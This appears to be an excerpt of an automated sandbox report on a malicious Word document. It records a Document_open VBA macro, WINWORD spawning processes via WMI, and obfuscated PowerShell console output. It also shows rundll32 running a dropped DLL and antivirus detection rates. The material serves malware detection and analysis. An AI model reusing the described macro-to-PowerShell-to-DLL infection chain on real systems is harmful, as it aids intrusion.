                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003506C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00351B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00353D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00352965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00356B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003599A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003537F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003573C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003577C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003593C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020BC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020C83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00203C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020C014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00203856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002060B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002010BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00204689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020B499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002004E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002010E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002032F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002072F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00205AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00201ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002084D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00205CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00208F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002043BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0037303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00381E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00789CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00797D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00793D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079B3FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_007937F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_007989F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_007993C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00798668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00781658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00791259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00785856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00794E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00798831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00787E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00782628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00784A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0079C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0078421E
                      Source: Arch_2021_717-1562532.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open
                      Source: Arch_2021_717-1562532.docOLE indicator, VBA macros: true
                      Source: N49I.dll.5.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@28/8@1/4
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ch_2021_717-1562532.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD799.tmpJump to behavior
                      Source: Arch_2021_717-1562532.docOLE indicator, Word Document stream: true
                      Source: Arch_2021_717-1562532.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ..&.........*........................... .........................&.......&.............#.........................&.....h.......5kU.......&.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ............*...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.&.....L.................&.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......h.Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v.....................o.j......................J.............}..v.....4t.....0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................o.j..... J...............J.............}..v....p5t.....0.u.............h.Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v.....................o.j......................J.............}..v....0Bt.....0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................o.j....H.Q...............J.............}..v.....Bt.....0.u...............Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....#................l.j......................J.............}..v....pyu.....0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................l.j..... J...............J.............}..v.....zu.....0.u...............Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....7...............T..j....0IQ...............J.............}..v....x.......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....0.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....C...............T..j....0IQ...............J.............}..v....x.......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....0.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....O...............T..j....0IQ...............J.............}..v....x.......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....0.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.u..............EQ.....(.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v............0.u..............EQ.....$.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....s...............T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H ......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....'......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....'................J.............}..v....H(......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v...../......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j...../................J.............}..v....H0......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....7......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....7................J.............}..v....H8......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....?......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....?................J.............}..v....H@......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....G......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....G................J.............}..v....HH......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....'...............T..j....0IQ...............J.............}..v.....O......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....O................J.............}..v....HP......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....3...............T..j....0IQ...............J.............}..v.....W......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....W................J.............}..v....HX......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....?...............T..j....0IQ...............J.............}..v....._......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....._................J.............}..v....H`......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....K...............T..j....0IQ...............J.............}..v.....g......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....g................J.............}..v....Hh......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....W...............T..j....0IQ...............J.............}..v.....o......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....o................J.............}..v....Hp......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....c...............T..j....0IQ...............J.............}..v.....w......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....w................J.............}..v....Hx......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....o...............T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....{...............T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.u..............EQ.....<.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v....h.......0.u...............&.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&.....r.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................J.............}..v....(.......0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......T..j....0IQ...............J.............}..v............0.u..............EQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....p.................J.............}..v............0.u..............FQ.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4i.j....E.................J.............}..v....X.......0.u.............H.Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4i.j....E.................J.............}..v.....5......0.u.............H.Q.............................
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: Arch_2021_717-1562532.docVirustotal: Detection: 16%
                      Source: Arch_2021_717-1562532.docReversingLabs: Detection: 27%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
